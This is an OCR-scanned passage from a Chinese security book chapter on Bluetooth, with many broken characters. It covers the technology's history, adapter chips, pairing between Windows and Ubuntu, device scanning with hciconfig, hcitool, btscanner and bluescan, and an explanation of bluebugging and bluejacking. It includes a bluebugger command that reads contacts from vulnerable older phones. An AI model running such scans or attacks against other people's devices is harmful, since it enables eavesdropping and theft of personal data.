给 ， 蓝 牙 在 其 中 发 挥 了 重要 作用 。 本 章 介绍 无 线 蓝牙 设备 的 安全 防护 策略 ， 主 要 内 容 包括 
了 解 蓝牙 、 蓝 牙 设 备 的 配对 操作 、 蓝 牙 基 本 Hacking 技 术 、 蓝 牙 DoS 攻 击 技术 及 蓝牙 的 安 


全 防护 策略 等 内 容 。 
16.1 了 解 乾 牙 


蓝牙 技术 已 经 融入 了 人 们 生活 当中 ， 
进入 商场 ， 几 乎 每 款 手机 都 带 有 蓝牙 功 
能 。 另 外 ， 常 见 的 蓝牙 设备 有 蓝牙 耳机 、 
蓝牙 适配器 和 蓝牙 键盘 等 。 下 图 分 别 为 蓝 
牙 键盘 和 蓝牙 耳机 。 


16.1.1 什么 是 蓝牙 


蓝牙 这 个 名 称 来 自 于 10 世 纪 的 一 位 丹 
麦 国王 Harald Blatand，Blatand 在 英文 里 
的 意思 可 以 被 解释 为 Bluetooth (蓝牙 ) 
因为 国王 喜欢 吃 蓝 梅 ， 牙 眼 每 天 都 是 蓝 色 
的 ， 所 以 叫 蓝牙 。 在 行业 协会 筹备 阶段 ， 
需要 一 个 极 具 表现 力 的 名 字 来 命名 这 项 高 
新 技术 。 行 业 组 织 人 员 ， 在 经 过 一 夜 关于 
欧洲 历史 和 未 来 无 限 技术 发 展 的 讨论 后 ， 
有 些 人 认为 用 Blatand 国 王 的 名 字 命 名 再 合 


适 不 过 了 。Blatand 国 王将 现在 的 挪威 ， 瑞 
典 和 丹麦 统一 起 来 ， 他 的 口齿 伶俐 ， 善 于 
交际 ， 就 如 同 这 项 即将 面世 的 技术 ， 技 术 
将 被 定义 为 允许 不 同 工 业 领域 之 间 的 协调 
工作 ， 保 持 着 各 个 系统 领域 之 间 的 良好 交 
流 ， 例 如 计算 机 、 手 机 和 汽车 行业 之 间 的 
工作 。 名 字 于 是 就 这 么 定 下 来 了 。 

蓝牙 的 创始 人 是 瑞典 爱立信 公司 ， 爱 
立信 早 在 1994 年 就 已 进行 研发 。1997 年 ， 
爱立信 与 其 他 设备 生产 商 联系 ， 并 激发 了 
他 们 对 该 项 技术 的 浓厚 兴趣 。1998 年 2 月 ， 
5 个 跨国 大 公司 ， 包 括 爱 立信 、 诺 基 亚 、 
IBM、 东 芝 及 Intel 组 成 了 一 个 特殊 兴趣 小 组 
(Special Interest Group，SIG) ， 他 们 共同 
的 目标 是 建立 一 个 全 球 性 的 小 范围 无 线 通 
信 技 术 ， 即 现在 的 蓝牙 。 下 图 为 蓝牙 技术 
的 标志 。 


@ Bluetooth 


蓝牙 是 一 种 支持 设备 短 距离 一般 10m 
内 ) 通信 的 无 线 电 技术 ， 能 在 包括 移动 电 
话 、PDA、 无 线 耳 机 、 笔 记 本 电脑 和 相关 
外 设 等 众多 设备 之 间 进 行 无 线 信息 交换 。 
利用 “蓝牙 ”技术 ， 能 够 有 效 地 简化 移动 
通信 终端 设备 之 间 的 通信 ， 也 能 够 成 功 地 
简化 设备 与 Internet 之 间 的 通信 ， 从 而 使 数 
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据 传输 变 得 更 加 迅速 、 高 效 ， 为 无 线 通信 
拓宽 道路 。 蓝 牙 采 用 分 散 式 网 络 结构 及 快 
跳 频 和 短 包 技 术 ， 支 持 点 对 点 及 点 对 多 点 
通信 ， 工 作 在 全 球 通用 的 2.4GHz ISM ( 即 
工业 、 科 学 、 医 学 ) 频段 。 其 数据 速率 为 
1Mb/s。 采 用 时 分 双 工 传输 方案 实现 全 双 工 
传输 。 

Bluetooth 无 线 技术 是 市 场 上 支持 范围 
广泛 ， 功 能 丰富 且 安 全 的 无 线 标准 。 全 球 
范围 内 的 资格 认证 程序 可 以 测试 成 员 的 产 
品 是 否 符合 标准 。 自 1999 年 发 布 Blue- 
tooth 规格 以 来 ， 总 共有 超过 4000 家 公司 
成 为 Bluetooth 特别 兴趣 小 组 的 成 员 。 


16.1.2 ”蓝牙 适配器 的 选择 


蓝牙 适配器 就 是 为 了 各 种 数码 产品 能 
适用 蓝牙 设备 的 接口 转换 器 。 总 线 类 型 可 
分 为 ITSA 总 线 、PCI 总 线 和 USB 总 线 。ISA 
总 线 以 16 位 传送 数据 ， 标 称 速度 能 够 达到 
10Mb/s。PCI 总 线 以 32 位 传送 数据 ， 速 度 较 
快 。 随 着 USB 接 口 的 逐渐 普及 ， 现 有 的 蓝 
牙 适 配器 基本 上 都 为 USB 总 线 的 ， 即 蓝牙 
USB 适 配器 。 

蓝牙 适配器 和 前 面 提 及 的 无 线 网 卡 一 
样 。 对 于 芯片 ， 也 有 很 多 厂商 推出 了 不 同 
的 芯片 。 不 过 这 些 芯 片 的 种 类 和 数量 要 远 
超 于 无 线 WiFi 的 数量 ， 想 想 这 世界 上 带 有 


(Cas 


蓝牙 功能 的 手机 、PDA、 笔 记 本 电脑 的 使 
用 人 数 吧 ， 单 是 手机 这 一 项 ， 数 量 就 已 经 
很 多 了 。 

不 过 现在 提 及 的 蓝牙 适配器 ， 暂 时 仅 
限于 用 于 电脑 主机 的 外 接 蓝牙 适配器 ， 主 
要 以 USB 接 口 为 主 。 下 图 为 其 外 形 ， 一 般 
都 很 小 巧 。 


提 到 蓝牙 适配器 的 选择 就 会 涉及 蓝牙 
芯片 ， 不 过 市 面 上 绝 大 部 分 外 置 蓝牙 适 配 
器 都 采用 CSR 芯 片 ， 所 以 这 里 就 以 CSR 蓝 
牙 芯片 为 例 做 简单 说 明 。 


CSR， 全 称 为 Cambridge Silicon Radio， 总 部 设 在 英国 剑桥 的 CSR 公 司 ， 是 全 球 
领先 的 个 人 无 线 技 术 提 供 商 。 其 产品 组 合 包 括 蓝牙 、GPS、FM 接 收 器 和 WiFi (IEEE 
802.11) 。CSR 基 于 其 芯片 平台 提供 先进 的 软 硬 件 解决 方案 ， 并 与 完全 集成 的 无 线 电 、 
基带 及 微型 控制 器 的 产品 合并 。 蓝 牙 设备 厂商 ， 被 誉 为 无 线 科 技 专家 暨 全 球 蓝 牙 连 接 方 
案 领导 厂商 。CSR 开 发 的 产品 解决 了 设计 者 所 面临 的 关键 问题 ， 如 成 本 、 尺 寸 、 性 能 及 
互 操作 性 等 。 而 CSR 公 司 作 为 SIG 联 盟 的 初期 成 员 之 一 ， 到 2008 年 4 月 ， 售 出 蓝牙 芯片 
已 达 十 亿 块 。 其 占据 市 场 领 先 地 位 的 CSR BlueCore 芯 片 ， 得 到 所 有 一 线 手机 制造 商 的 采 
用 ， 目 前 CSR 公 司 客户 包括 许多 业界 领先 的 厂商 ， 例 如 苹果 、 戴 尔 、LG、 摩 托 罗拉 、 
NEC、 诺 基 亚 、 松 下 、RIM、 三 星 、 夏 善 、 索 尼 、TomTom 和 东芝 等 。 此 外 ， 市 场 上 已 


有 约 60% 的 蓝牙 产品 采用 了 CSR 的 蓝牙 芯片 。 
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下 图 分 别 为 CSR 公 司 标志 和 CSR 的 蓝牙 


csr 


在 Windows 操 作 系 统 下 用 BlueSoleil 查 
看 当前 的 蓝牙 适配器 属性 ， 显 示 其 使 用 的 
正 是 CSR 芯 片 ， 如 下 图 所 示 。 
x| 
常规 “| 可 访问 性 | 服务 | 串口 | 高 级 [硬件 


硬件 属性 
设备 地 址 ; 


00;15:83:15;43;10 


制造 商 : Canbridge Silicon Radio 
ICI 版本: 2.0 
3CI 修订 : csc 
UP 版 本 : 2.0 
LUIF 子 版 本 : CSC 


感 兴趣 的 读者 可 以 到 CSR 官 方 网 站 
http://www.csr.com 上 了 解 更 多 内 容 。 


蓝牙 设备 的 配对 操作 
对 于 手机 与 蓝牙 耳机 的 配对 ， 笔 记 本 


16.2 
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电脑 与 智能 手机 的 配对 ， 相 信用 户 都 比较 
了 解 了 。 那 么 ， 为 了 让 用 户 掌握 不 同 操作 
系统 的 蓝牙 配对 ， 本 节 就 以 两 台 分 别 安装 
了 Windows 2003 和 Ubuntu 操作 系统 的 笔记 
本 电脑 之 间 的 蓝牙 连接 为 例 ， 讲 解 蓝牙 设 
备 间 配对 的 操作 。 


16.2.1 蓝牙 (驱动 ) 工具 安装 


实际 工作 中 ， 在 使 用 蓝牙 设备 之 前 ， 
需要 先 安 装 蓝牙 驱动 (工具 ) ， 这 样 才能 
够 识别 出 蓝牙 适配器 ， 并 使 用 其 与 其 他 
蓝牙 外 设 进行 正常 工作 。 很 多 读者 可 能 除 
了 手机 上 的 蓝牙 外 ， 对 于 笔记 本 电脑 上 
的 蓝牙 适配器 如 何 使 用 还 是 不 太 了 解 ， 所 
以 下 面 就 以 实例 来 讲解 蓝牙 工具 的 安装 及 
使 用 。 


1. Windows 操 作 系 统 下 安装 蓝牙 工具 


Windows 操 作 系统 下 除了 系统 自 带 的 蓝 
牙 驱 动 外 ， 其 实 最 广泛 使 用 的 是 由 IVT 公 司 
开发 的 蓝牙 软件 产品 BlueSoleil。 

BlueSoleil 可 以 让 计算 机 享受 蓝牙 的 便 
捷 。 和 凭借 3Mb/s 的 数据 交换 量 ， 用 户 可 以 
畅 昕 音质 好 的 音乐 并 无 线 使 用 蓝牙 鼠标 和 
键盘 。 和 凭借 独特 的 蓝牙 AV/Mono 数 据 频 道 
协同 工作 方式 ，BlueSoleil 支 持 用 户 同 时 通 
过 普通 的 蓝牙 立体 声 仿真 耳机 听 音 乐 和 打 
电话 ， 或 者 轻松 地 转换 这 两 种 模式 ， 新 加 
入 的 Skype 2.X 程 序 可 以 方便 地 让 用 户 通过 
普通 的 蓝牙 耳机 接 打 电话 。 通 过 使 用 蓝牙 
适配器 ，BlueSoleil 可 以 实现 多 台电 脑 组 网 
并 且 无 线 交 互信 息 。BlueSoleil 还 可 以 实现 
电脑 和 其 他 蓝牙 设备 快速 、 稳 定 的 连接 ， 
例如 移动 手机 、 头 戴 式 耳机 、 个 人 掌上 电 
脑 、 局 域 网 接 入 设备 、 打 印 机 、 数 码 相 
机 、 电 脑 的 外 部 设备 等 ， 可 以 说 是 Windows 
操作 系统 下 必 备 的 蓝牙 工具 。 

官方 网 站 : http://www.bluesoleil.com。 

下 图 为 Windows 操 作 系 统 下 BlueSoleil 
的 工作 界面 。 
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2. Linux 操 作 系 统 下 安装 蓝牙 工具 


若 BackTrack4 Linux 下 没有 蓝牙 工具 或 
者 需要 升级 到 最 新 的 版 本 ， 可 以 使 用 如 下 
命令 实现 。 


sudo apt-get install bluez-utils 
libbluetooth-dev 


按 Enter 键 后 ， 就 能 看 到 如 下 图 所 示 的 
内 容 。 


启用 蓝牙 适配器 


在 蓝牙 驱动 (工具) 安装 完毕 后 ， 就 
可 以 启用 蓝牙 适配器 了 ， 具 体 的 操作 步骤 
如 下 。 

[ep 图 在 Windows 2003 操 作 系 统 下 安装 好 
上 面 提 到 的 BlueSoleil， 并 准备 好 蓝牙 适 
配器 ， 将 蓝牙 适配器 插入 笔记 本 电脑 对 应 
接口 。 


昌 16.2.2 
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step 回 此 时 ， 在 系统 的 任务 栏 上 会 显示 “发 
现 蓝牙 硬件 ”的 提示 。 


已 蓝牙 X 


发 现 蓝牙 硬 件 
De da 
step 图 在 任务 栏 的 蓝牙 图 标 上 单 击 筷 标 右 


DD 5 12:09zerone 


键 ， 选 择 “ 启 动 蓝牙 ”选项 。 


step 国 启动 完成 后 ， 在 此 图 标 上 单 击 鼠 标 右 
键 ， 可 以 看 到 此 时 出 现 了 完整 的 菜单 ， 选 
择 “ 显 示 经 典 界面 ”选项 。 


浏览 蓝牙 位 置 (x) 


可 以 看 到 如 下 图 所 示 的 界面 ， 这 是 
Windows 2003 操 作 系 统 下 BlueSoleil 的 主 界 
面 ， 出 现 该 界面 意味 着 蓝牙 适配器 已 经 正 
常 载 入 。 


加 忆 寺 才 往 加。 办 人 好 ob 


类 似 地 ， 在 另 一 台 安装 了 Ubuntu 9.10 桌 
面 版 操作 系统 的 笔记 本 电脑 上 ， 也 插入 蓝牙 
适配器 ， 并 在 任务 栏 上 启用 蓝牙 功能 。 


和 钨 提示 :Linux 操 作 系 统 下 的 配置 与 Ubuntu 
下 的 配置 极其 相似 ， 不 过 在 使 用 前 需要 提 
前 安装 蓝牙 工具 或 驱动 包 。 


16.2.3 ”搜索 开启 蓝牙 功能 的 设备 


当 蓝 牙 适 配器 成 功 载 入 后 ， 下 面 就 可 
以 开始 搜索 蓝牙 设备 了 。 在 默认 情况 下 ， 
操作 系统 下 的 蓝牙 功能 是 自动 进入 被 搜索 
模式 的 ， 也 就 是 “可 被 搜索 到 ”这 个 选项 
被 选中 。 当 然 ， 也 可 以 根据 实际 需要 取消 
这 个 选项 ， 从 而 使 得 笔记 本 电脑 的 蓝牙 不 
可 见 。 具 体操 作 随 着 操作 系统 及 蓝牙 工具 
的 不 同 ， 也 将 会 有 细节 上 的 不 同 ， 需 要 用 
户 仔细 查看 对 应 的 说 明文 档 。 
[sep 贺 如 下 图 所 示 为 Windows 2003 操 作 系 
统 下 的 蓝牙 配置 工具 Bluesoleil 中 的 “我 
的 设备 属性 ”界面 ， 在 “可 访问 性 ”选项 
卡 中 ， 如 果 勾 选 “ 允 许 其 他 设备 发 现 该 设 
备 ” 复 选 框 ， 则 意味 着 当前 的 蓝牙 设备 是 
可 被 搜索 到 的 ， 取 消 色 选 ， 则 其 他 设备 便 
无 法 发 现 该 设备 。 

EEE > 

第 规 。 可 访问 性 | 服务 | 串口 | 高 级 | 硬件 | 


-可 访问 性 


厅 区 许 其 他 设备 连接 该 设备 D) 


| 
通知 

显示 提示 信息 GE) 

厅 在 通知 区 域 显示 蓝牙 图 标 0D 


| Ce ww | maw | 
一 般 来 说 ， 当 便携 式 设备 进入 搜索 模 
式 后 ， 会 出 现 指示 灯 一 闪 一 闪 的 情况 。 以 
Ubuntu 为 例 ， 此 时 就 可 以 在 Ubuntu 操 作 系 
统 任 务 栏 上 单 击 蓝牙 标志 ， 在 其 下 拉 菜 单 
中 选择 “设置 新 的 设备 ”选项 。 


i /E:T P(e 


关闭 蓝牙 
发 送 文件 到 设备 ,,， 


浏览 设备 上 的 文件 … 
设置 新 的 设备 … 
首选 项. 
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[step 图 弹出 如 下 图 所 示 的 向 导 界 面 ， 单 击 
“前 进 ” 按 钮 来 继续 下 一 步 。 


总 
全. 全 全 莫 寺 新 设备 设置 


欢迎 来 到 蓝牙 新 设备 安装 向 导 
本 设备 安装 向 导 将 帮助 您 在 这 台电 脑 上 配置 带 有 蓝牙 功能 的 相关 设备 。 


该 设备 必须 位 于 你 的 计算 机 10 米 范围 内 ， 并 “可 被 发 现 #8221; 
(有 时 称 为 “可 见 的 ")， 如 有 疑问 请 检查 设备 手册 。 


[step 图 稍 等 片刻 ， 就 能 看 到 找到 了 两 个 蓝 政 
设备 ， 在 设备 搜索 界面 中 会 在 类 型 中 给 出 
定义 。 其 中 ， 名 为 mckh3e8b4flbc6 的 是 一 
台 计 算 机 ， 也 就 是 要 连接 的 安装 Windows 
2003 操 作 系 统 的 笔记 本 电脑 。 


—————] 


器 
轴 “liuwei" 的 iPod 


设备 类 型 (T): 


| 
上 


seep 图 此 时 ， 若 希望 看 到 蓝牙 设备 的 MAC 
地 址 ， 也 可 以 在 Shell 下 使 用 hcitool 命 令 进行 
蓝牙 设备 扫描 。 
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昌 16.2.4 ”使 用 蓝牙 适配器 进行 设备 间 配 对 


了 在 蓝牙 设备 配对 中 ， 并 不 需要 输入 账 
户 ， 只 需要 被 连接 方 输入 正确 的 PIN 码 ， 就 
能 够 建立 合法 的 蓝牙 连接 。 

[se 加 在 上 面 Step04 中 用 鼠标 选择 搜索 到 
的 这 个 名 为 mckh3e8b4flbc6 的 设备 ， 然 后 
单 击 该 界面 下 方 的 “前 进 ” 按 钮 ， 当 前 的 
Ubuntu 9.10 操 作 系 统 就 会 自动 生成 一 个 随 
机 PIN 码 ， 并 要 求 对 方 设备 输入 该 PIN 码 以 
建立 合法 的 可 信和 连接 。 
EET 


请 在 'mckh3e8b4flbc6， 输入 如 下 的 PIN : 


299433 


当然 ， 若 用 户 希 望 使 用 简单 的 固 
定 PIN 码 ， 而 非 随机 码 ， 也 可 以 在 上 小 节 
Step04 中 单 击 “PIN 选 项 ”按钮 来 使 用 如 下 
图 所 示 诸 如 0000、1111、1234 等 固定 PIN 
码 。 这 类 PIN 码 一 般 都 是 诸如 蓝牙 耳机 、 蓝 
牙 GPS 模 块 等 设备 固定 使 用 的 ， 都 是 由 厂商 
出 厂 之 前 直接 设置 好 的 ， 在 其 产品 说 明 书 
中 都 会 有 说 明 。 


自动 选择 PIN(A) 
固定 的 PIN 
'0000' (大 多 数 耳 机 、 鼠 标 和 GPS 设备 ) 
'1111' 
'1234' 


加 自 定义 PIN 码 : 


12344321 


step 图 当 Ubuntu 操 作 系 统 下 出 现 随 机 的 PIN 


之 1 


码 内 容 后 ， 此 时 在 Windows 2003 操 作 系 统 
下 的 蓝牙 配置 工具 Bluesoleil 上 就 会 出 现 如 
下 图 所 示 的 弹出 窗口 ， 上 面 告 知 Windows 
2003 用 户 当 前 有 设备 试图 进行 配对 ， 此 时 
直接 输入 事先 制定 好 的 PIN 码 ， 单 击 “ 确 
定 ” 按 钮 即 可 。 


更 昔 下 


口令 (00:19:15:65:59:99) 


ET 


取消 已) 


未 知 设备 
00:19:15:65:59;99 


HE 


5 秒 


step 园 若 PIN 码 不 正确 会 有 提示 ， 但 只 要 成 
功 配对 ， 就 能 看 到 如 下 图 所 示 内 容 ， 图 中 
出 现 了 一 个 计算 机 图 标 ， 且 该 图 标 与 中 心 
建立 了 一 条 关联 线路 ， 这 就 表示 已 经 成 功 
配对 了 ， 同 时 主 界面 下 方 的 状态 栏 上 也 会 
有 “已 连接 ”的 提示 。 


step 图 与 此 同时 ， 在 Ubuntu 9.10 操 作 系 统 上 
也 会 出 现 如 下 图 所 示 的 提示 界面 ， 告 知 蓝 
牙 设备 之 间 的 配对 已 经 完成 。 


成 功 设置 新 设 关 "mckh3e8baf1bc6' 


16.3 ”蓝牙 基本 Hacking 技 术 


蓝牙 技术 在 给 和 人们 带 来 方便 的 同时 ， 
也 给 人 们 带 来 了 一 些 安全 隐患 ， 下 面 就 来 
介绍 一 些 蓝牙 基本 Hacking 技 术 。 


16.3.1 识别 及 激活 蓝牙 设备 


市 面 上 蓝牙 适配器 有 多 种 ， 大 小 也 
各 不 相同 ， 不 过 大 多 数 外 置 蓝牙 适配器 均 
以 USB 接 口 为 主 。 在 识别 及 激活 蓝牙 设备 
前 ， 需 要 在 笔记 本 电脑 上 插入 USB 接 口 的 
外 置 蓝牙 适配器 ， 正 确 插入 USB 外 置 蓝牙 
适配器 的 效果 如 下 图 所 示 。 


Sp 


在 正确 插入 USB 外 置 蓝牙 适配器 后 ， 
就 可 以 使 用 Linux 操 作 系统 内 置 的 hciconfig 
命令 对 蓝牙 适配器 的 插入 状态 进行 查询 ， 
具体 命令 如 下 : 


hciconfig 


一 般 都 会 先 输入 hciconfig 命 令 来 查看 是 
否 有 蓝牙 设备 插入 ， 直 接 按 Enter 键 后 即 可 看 
到 当前 已 经 识别 出 来 的 蓝牙 适配器 ， 如 下 
图 所 示 为 hci0。 注 意 ， 此 时 在 hci0 后 面 的 BD 
Address 处 显示 为 “00:00:00:00:00:00”， 这 
就 意味 着 该 蓝牙 适配器 驱动 并 未 载 入 。 


在 确认 已 经 识别 出 蓝牙 适配器 后 ， 就 
可 以 进行 将 蓝牙 适配器 载 入 的 操作 了 。 具 
体 命 令 如 下 : 


hciconfig hci0 up 
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【参数 解释 】 
e hci0: 为 蓝牙 适配器 名 称 ， 一 般 都 
为 hci0， 若 有 多 个 蓝牙 适配器 ， 则 
第 二 个 就 是 hcil， 以 此 类 推 。 
e up: 和 ifconfig 类 似 ，up 是 载 入 该 设 
备 ， 若 是 down， 就 是 卸载 该 设备 。 
在 激活 蓝牙 适配器 后 ， 就 能 够 看 到 如 
下 图 所 示 的 内 容 ， 其 中 ， 在 BD Address 一 栏 
可 以 清楚 地 看 到 出 现 了 具体 的 MAC， 这 就 
表示 系统 已 经 正确 识别 并 载 入 了 该 蓝牙 适 
配器 的 驱动 。 


16.3.2 ”查看 蓝牙 设备 相关 内 容 


hciconfig 所 能 提供 的 功能 有 很 多 ， 在 
Linux 操 作 系 统 下 可 以 使 用 -help 参 数 或 者 使 
用 man 命 令 来 查看 这 些 支 持 的 功能 。 下 面 
举 一 个 例子 。 


hciconfig hci0 class 


【参数 解释 】 

e hci0: 这 里 指 的 是 当前 已 经 载 入 的 

蓝牙 设备 ， 这 里 就 是 hci0。 

e@ class: 支持 级 别 、 内 容 。 

按 Enter 键 后 就 能 看 到 如 下 图 所 示 的 内 
容 ， 不 过 在 下 图 中 Service Classes 和 Device 
Class 等 处 ， 并 没有 看 到 显示 出 很 详细 的 
内 容 。 


同 | 加 se 


对 于 有 的 蓝牙 适配器 ，hciconfig 可 以 
轻松 地 将 其 提取 出 来 。 如 下 图 所 示 ， 可 以 
看 到 在 Service Classes 处 显示 为 “Rendering, 
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Information”， 而 在 Device Class 处 显示 为 
“Computer,Laptop” 。 


16.3.3 ”扫描 蓝牙 设备 


为 了 便于 蓝牙 设备 的 连接 ， 那 些 开 启 了 
蓝牙 功能 的 智能 手机 、PDA 和 PSP 等 便携 式 设 
备 ， 在 默认 情况 下 ， 都 是 处 于 广播 开启 状态 
的 ， 也 就 是 说 允许 其 他 任意 蓝牙 设备 探测 。 
而 在 Linux 操 作 系 统 下 ， 扫 描 蓝 牙 设备 常用 到 
的 工具 就 是 hcitool 及 图 形 化 的 btscanner。 


1. hcitool 


在 Linux 操 作 系 统 下 完成 BackTrack4 的 
升级 操作 后 ， 系 统 会 自动 安装 好 蓝牙 的 全 
套 操作 工具 ， 其 中 就 包括 了 hcitool。 该 工具 
支持 大 量 的 蓝牙 设备 操作 ， 如 扫描 、 查 看 
设备 属性 等 。 下 面 就 来 看 一 些 该 工具 是 如 
何 进行 扫描 的 。 具 体 命令 如 下 : 


hcitool -i hci0 scan 


【参数 解释 】 

e -i: 设备 名 称 ， 这 里 的 蓝牙 设备 名 称 
是 hci0， 还 可 以 先 输入 hciconfig 来 查 
看 其 名 称 ， 不 过 若 只 有 一 个 蓝牙 适 
配器 ， 这 个 -i 参数 可 省 略 。 

e scan: 扫描 模式 ， 该 模式 下 将 对 附 
近 蓝 牙 适 配器 工作 范围 内 的 所 有 蓝 
牙 设备 进行 探测 。 

按 Enter 键 后 就 开始 扫描 ， 稍 等 片刻 就 

可 以 看 到 如 下 图 所 示 的 内 容 ， 可 以 看 到 发 
现 了 两 个 蓝牙 设备 ， 在 名 称 描 述 上 出 现 了 
“Dell Wireless 365 Bluetooth Module” 字 
样 的 设备 。 根 据 经 验 ， 显 示 为 Module 模 块 
的 ， 一 般 都 是 笔记 本 电脑 上 的 蓝牙 模块 ， 

所 以 初步 判断 为 两 台 开 启 了 蓝牙 功能 的 笔 
记 本 电脑 。 
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侈 注意 : 该 命令 很 简单 直观 ， 不 过 也 有 个 
缺点 ， 就 是 不 能 够 持续 地 探测 周边 的 蓝牙 
设备 。 


2. btscanner 


用 户 要 想 使 用 btscanner 工 具 扫描 蓝牙 设 
备 ， 需 要 先 打 开 该 工具 ， 有 两 种 打开 方式 : 
一 个 是 通过 蓝牙 功能 菜单 ， 另 一 个 是 先 打开 
一 个 shell， 然 后 在 其 中 输入 btscanner。 

在 打开 btscanner 之 前 ， 该 工具 会 自动 
检查 是 否 存在 蓝牙 设备 ， 如 存在 则 启动 并 
进入 图 形 模式 ， 否 则 不 能 启动 。 当 刚 进入 
btscanner 时 ， 会 看 到 如 下 图 所 示 的 界面 ， 在 
其 中 可 以 看 到 给 出 了 相应 参数 的 关键 字 。 


SEERRETTRI 


Scan，b-brute force scan, a-abort scan, s-save Sumary 
quit 


这 里 如 果 输 入 字母 “i”， 即 采用 “in- 
quiry scan” 扫 描 方式 ， 按 Enter 键 后 稍 等 片 
刻 ， 就 能 够 看 到 如 下 图 所 示 的 内 容 ， 可 以 看 
到 发 现 了 3 个 开启 了 蓝牙 的 设备 。 与 hcitool 
不 同 ， 这 款 工 具 会 实时 对 当前 蓝牙 适配器 有 
效 探测 范围 (一般 以 6m 为 半径 内 进行 扫 
描 ， 并 将 扫描 结果 实时 地 显示 在 上 方 。 换 句 
话说 ， 就 是 不 停 地 对 周边 进行 雷达 式 扫描 。 
如 下 图 所 示 ， 能 看 到 会 不 停 地 出 现 “Found 
device XXXXXxXXxXxXx” 提 示 ， 这 就 表 
示 扫 描 到 了 新 的 蓝牙 设备 。 
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需要 注意 的 是 ， 有 时 ， 由 于 距离 、 扫 描 
频率 等 因素 ，btscanner 在 初次 扫描 的 时 候 ， 会 
识别 不 出 蓝牙 设备 的 名 称 ， 如 下 图 所 示 ， 在 设 
备 后 面 会 出 现 “unlmown” (未 知 ) 的 提示 。 


别 出 该 蓝牙 设备 的 名 称 ， 刚 才 显示 为 “un- 
known” 的 设备 名 称 已 经 被 识别 出 来 ， 为 
“OMIZ_2219”， 这 是 一 款 蓝牙 耳机 ， 如 
下 图 所 示 。 


Tine ras 
809785/20 12:59:54 DO: 12:D2:91:34:Ca 8X1923 


Cl orf class Mone 
DX109114 Chrastopner Yang 


3. bluescan 

车 用 户 对 btscanner 的 不 间断 扫描 方式 不 
满意 ， 还 可 以 使 用 bluescan 进 行 蓝牙 设备 的 
搜索 ， 具 体 命令 如 下 : 

/bluescan 


输入 效果 如 下 图 所 示 ， 如 果 不 需要 参 
数 ， 直 接 按 Enter 键 就 可 以 开始 扫描 。 


开始 扫描 后 ，bluescan 会 不 断 地 扫描 周 
边 的 蓝牙 信号 ， 并 同时 将 扫描 的 结果 反馈 
到 当前 界面 上 。 如 下 图 所 示 ， 可 以 看 到 多 
个 名 称 描 述 为 “Dell Wireless 365 Bluetooth 
Module” 的 设备 被 扫描 到 ， 这 些 设备 MAC 
地 址 皆 不 相同 ， 这 是 由 于 当前 环境 中 有 多 
台 Dell 笔 记 本 电脑 正在 使 用 。 


如 下 图 所 示 ，bluescan 会 自动 不 断 刷新 
周边 的 蓝牙 设备 ， 并 将 其 一 一 显示 在 当前 
界面 上 ， 除 了 名 为 “Dell Wireless 365 Blue- 
tooth Module” 的 笔记 本 蓝牙 模块 外 ， 还 出 
现 了 苹果 的 iPod 设备 。 


由 于 该 软件 是 不 间断 地 刷新 屏幕 ， 所 
以 会 出 现 重复 的 情况 。 当 不 需要 继续 扫描 
时 ， 可 以 使 用 键盘 上 Ctrl+C 组 合 键 来 强制 中 
断 扫 描 。 如 下 图 所 示 ， 在 中 断后 ，bluescan 
会 提示 保存 扫描 结果 ， 输 入 数字 “2” 并 
按 Enter 键 即 可 保存 ， 该 文件 被 保存 在 /root/ 


bslog .txt。 


root@ ZerOne: /Pentest/bluetooth/bluescan - Shell - BlueScan 
sion Edit View Bookmarks Settings Help 
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若 需要 查看 扫描 结果 ， 在 Linux 操 作 系 
统 下 可 以 使 用 cat 命 令 打开 该 文件 ， 具 体 命 
令 如 下 : 

cat /root/bslog.txt 


按 Enter 键 后 就 可 以 看 到 如 下 图 所 示 的 
内 容 ， 该 文本 中 记录 了 所 有 已 扫描 到 的 蓝 
aad 人 


16.3.4 ”蓝牙 攻击 技术 


任何 一 个 新 技术 在 使 用 的 过 程 中 ， 都 
会 出 现 这 样 或 者 那样 的 安全 漏洞 和 潜在 的 
攻击 隐患 ， 蓝 牙 技 术 也 不 例外 。 下 面 就 来 
介绍 比较 出 名 的 蓝牙 攻击 ， 分 别 是 bluebug- 
ging 攻 击 和 bluejacking 攻 击 。 


1. bluebugging 攻 击 


bluebugging 允许 恶意 攻击 者 利用 蓝牙 
无 线 技术 ， 在 事先 不 通知 或 不 提示 手机 用 
户 的 情况 下 ， 访 问 手机 命令 。 此 缺陷 可 以 
使 恶意 的 攻击 者 通过 手机 拨打 电话 、 发 送 
和 接收 短信 、 阅 读 和 编写 电话 簿 联系 人 、 
偷 听 电话 内 容 及 连接 至 互联 网 。 要 在 不 
使 用 专门 装备 的 情况 下 发 起 所 有 这 些 攻 
击 ， 黑 客 必须 位 于 距离 手机 蓝牙 有 效 工作 
范围 内 。 

此 类 攻击 最 早出 现 于 2005 年 4 月 ， 主 要 
是 蓝牙 自身 缺陷 导致 ， 受 其 影响 的 机 型 也 
主要 为 2005 年 前 后 的 Nokia 6310、6310i 及 
索爱 T68 等 ， ee 坎 智能 
手机 已 基本 不 受 其 影响 。 这 方面 较 出 名 的 
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工具 就 是 bluebugger 了 。 具 体 命令 如 下 : 
bluebugger -a 设备 地 址 info 
【参数 解释 】 
e -a: 设备 地 址 ， 这 里 的 设备 地 址 就 
是 预 攻击 的 地 址 。 
获取 目标 手机 上 的 信息 。 


e info: 


按 Enter 键 后 ， 如 果 攻 击 成 功 ， 可 以 看 
到 在 攻击 开启 了 蓝牙 功能 的 Nokia 6310i 的 手 
机 后 ， 成 功 地 获取 到 了 目标 手机 的 部 分 联系 
人 名 单 ， 包 括 姓 名 和 对 应 的 手机 号 码 。 


而 当 攻 击 失败 时 ， 会 有 “Cannot open” 
的 提示 ， 这 往往 是 由 于 目标 设备 当前 蓝牙 版 
放生 人 


2. bluejacking 攻 击 


bluejacking 是 指 手机 用 户 使 用 蓝牙 技 
术 匿 名 发 送 名 片 的 行为 。 需 要 注意 的 是 ， 
bluejacking 并 不 会 从 设备 上 删除 或 修改 任何 
数据 。 而 这 些 名 片 通常 包括 一 些 玩笑 、 挑 
喜 或 骚扰 性 的 消息 ， 而 不 是 通常 所 说 的 姓 
名 和 电话 号 码 。 

从 攻击 本 质 上 说 ， 接 收 bluejacking 消 


息 并 不 会 对 自身 的 手机 造成 危害 ， 但 接收 
bluejacking 文 件 会 存在 感染 恶意 代码 的 可 
能 ， 所 以 为 避免 垃圾 消息 群发 攻击 及 无 意 
识 的 私人 消息 泄露 ， 作 为 手机 机 主 应 拒绝 
